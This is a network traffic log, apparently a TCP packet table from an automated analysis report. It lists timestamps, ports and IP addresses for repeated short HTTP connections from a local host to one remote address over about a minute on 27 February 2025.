Feb 27, 2025 23:41:44.450861931 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:44.453835964 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:44.458982944 CET	80	49751	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:44.459058046 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:44.464153051 CET	80	49751	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:45.245909929 CET	80	49751	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:45.246033907 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:45.246280909 CET	80	49751	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:45.246332884 CET	49751	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:45.251241922 CET	80	49751	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:46.412030935 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:46.417489052 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:46.417566061 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:46.419303894 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:46.424494028 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:46.424571037 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:46.431071043 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:47.207174063 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:47.207297087 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:47.207459927 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:47.207509995 CET	49752	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:47.212379932 CET	80	49752	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:48.360711098 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:48.365968943 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:48.368652105 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:48.371711969 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:48.376822948 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:48.380354881 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:48.385443926 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:49.139020920 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:49.139372110 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:49.139467001 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:49.139545918 CET	49753	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:49.144737005 CET	80	49753	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:50.289378881 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:50.294930935 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:50.295048952 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:50.297977924 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:50.303061008 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:50.303138018 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:50.308209896 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:51.103409052 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:51.106019974 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:51.106126070 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:51.150585890 CET	49754	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:51.157552958 CET	80	49754	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:52.368618965 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:52.373898983 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:52.376303911 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:52.378026009 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:52.383057117 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:52.384767056 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:52.389767885 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:53.133999109 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:53.134277105 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:53.134282112 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:53.134383917 CET	49755	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:53.139389038 CET	80	49755	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:54.301729918 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:54.307029009 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:54.307126045 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:54.310059071 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:54.315068960 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:54.315138102 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:54.320187092 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:55.098129034 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:55.098268032 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:55.098510981 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:55.098572969 CET	49756	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:55.103399992 CET	80	49756	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:56.269783974 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:56.274959087 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:56.275029898 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:56.276932001 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:56.282028913 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:56.282079935 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:56.287148952 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:57.023044109 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:57.023183107 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:57.023278952 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:57.023358107 CET	49757	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:57.028256893 CET	80	49757	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.141415119 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.146640062 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.146713972 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.148442984 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.153549910 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.153604031 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.158658981 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.942468882 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.942904949 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:41:58.942970991 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.945281982 CET	49758	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:41:58.951334000 CET	80	49758	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.095448971 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.104306936 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.106245995 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.107971907 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.113068104 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.113162041 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.122431993 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.874108076 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.874262094 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.874634981 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:00.874702930 CET	49759	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:00.879919052 CET	80	49759	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.077013016 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.082227945 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.082307100 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.084042072 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.089096069 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.089164972 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.094345093 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.879786015 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.880001068 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:02.880075932 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.880551100 CET	49760	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:02.885704041 CET	80	49760	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.016410112 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.021845102 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.022030115 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.023924112 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.029033899 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.029218912 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.034359932 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.795308113 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.795783997 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:04.796104908 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.796106100 CET	49761	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:04.801292896 CET	80	49761	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:05.948420048 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:05.953819990 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:05.953912020 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:05.955667019 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:05.961730003 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:05.961795092 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:05.966845989 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:06.748857021 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:06.748960018 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:06.750159979 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:06.750216961 CET	49762	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:06.756267071 CET	80	49762	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:07.892676115 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:07.898109913 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:07.898242950 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:07.899980068 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:07.905085087 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:07.905333042 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:07.910428047 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:08.632430077 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:08.632728100 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:08.632996082 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:08.633059978 CET	49764	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:08.639487982 CET	80	49764	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:09.769673109 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:09.775918007 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:09.776004076 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:09.777889013 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:09.783979893 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:09.784039021 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:09.789938927 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:10.550929070 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:10.551444054 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:10.551672935 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:10.551672935 CET	49775	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:10.557977915 CET	80	49775	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:11.696535110 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:11.701884985 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:11.702042103 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:11.704489946 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:11.709549904 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:11.709602118 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:11.714648962 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:12.433851004 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:12.433867931 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:12.434084892 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:12.434084892 CET	49787	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:12.439182043 CET	80	49787	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:13.583869934 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:13.636748075 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:13.636838913 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:13.638946056 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:13.643953085 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:13.644259930 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:13.649251938 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:14.369138956 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:14.369726896 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:14.369807005 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:14.372482061 CET	49801	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:14.377551079 CET	80	49801	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:15.744683981 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:15.751554966 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:15.751703024 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:15.754618883 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:15.759654045 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:15.759723902 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:15.764846087 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:16.524491072 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:16.524708033 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:16.525456905 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:16.525517941 CET	49817	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:16.529854059 CET	80	49817	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:17.690864086 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:17.696271896 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:17.696368933 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:17.698087931 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:17.703144073 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:17.703200102 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:17.708247900 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:18.423037052 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:18.423465014 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:18.423721075 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:18.423721075 CET	49826	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:18.428878069 CET	80	49826	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:19.564667940 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:19.569907904 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:19.570002079 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:19.571718931 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:19.576827049 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:19.576889992 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:19.581950903 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:20.233335018 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:20.234409094 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:20.234461069 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:20.243385077 CET	49837	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:20.249593973 CET	80	49837	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:21.423774004 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:21.428970098 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:21.429069996 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:21.431018114 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:21.436156034 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:21.436219931 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:21.441368103 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:22.081111908 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:22.081809998 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:22.082048893 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:22.082050085 CET	49852	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:22.087244034 CET	80	49852	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:23.224412918 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:23.229603052 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:23.229682922 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:23.232394934 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:23.237847090 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:23.237914085 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:23.243371010 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:24.051625013 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:24.051804066 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:24.052367926 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:24.053198099 CET	49863	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:24.056977034 CET	80	49863	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.194086075 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.199250937 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.200628996 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.202790022 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.207839966 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.207910061 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.212937117 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.933454037 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.933535099 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:25.933558941 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.933643103 CET	49876	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:25.938719034 CET	80	49876	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.080284119 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.085794926 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.085892916 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.087585926 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.093023062 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.093105078 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.098527908 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.882982016 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.883156061 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.883277893 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:27.883326054 CET	49890	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:27.888227940 CET	80	49890	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.020267963 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.025650978 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.025751114 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.027693987 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.032738924 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.032802105 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.037858009 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.944809914 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.944870949 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.944932938 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.944932938 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.944947004 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:29.945012093 CET	49903	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:29.950256109 CET	80	49903	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.081649065 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.086806059 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.086899996 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.088630915 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.093755960 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.093903065 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.099028111 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.851857901 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.851927042 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:31.852104902 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.852247953 CET	49917	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:31.861196041 CET	80	49917	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:32.984452963 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:32.990647078 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:32.990730047 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:32.992568970 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:32.997606039 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:32.997651100 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:33.003405094 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:34.219734907 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:34.219791889 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:34.219841003 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:34.219877958 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:34.219877958 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:34.219878912 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:34.219980955 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:34.220030069 CET	49928	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:34.228943110 CET	80	49928	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:35.348056078 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:35.353144884 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:35.353231907 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:35.354984999 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:35.360023975 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:35.360167027 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:35.365236044 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:36.120542049 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:36.120651960 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:36.120954037 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:36.121011019 CET	49940	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:36.125802994 CET	80	49940	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:37.277796984 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:37.282918930 CET	80	49952	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:37.282987118 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:37.284733057 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:37.289843082 CET	80	49952	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:37.289891005 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:37.294900894 CET	80	49952	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:38.098862886 CET	80	49952	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:38.098939896 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:38.099082947 CET	80	49952	104.21.64.1	192.168.2.4
Feb 27, 2025 23:42:38.099128008 CET	49952	80	192.168.2.4	104.21.64.1
Feb 27, 2025 23:42:38.103965998 CET	80	49952	104.21.64.1	192.168.2.4
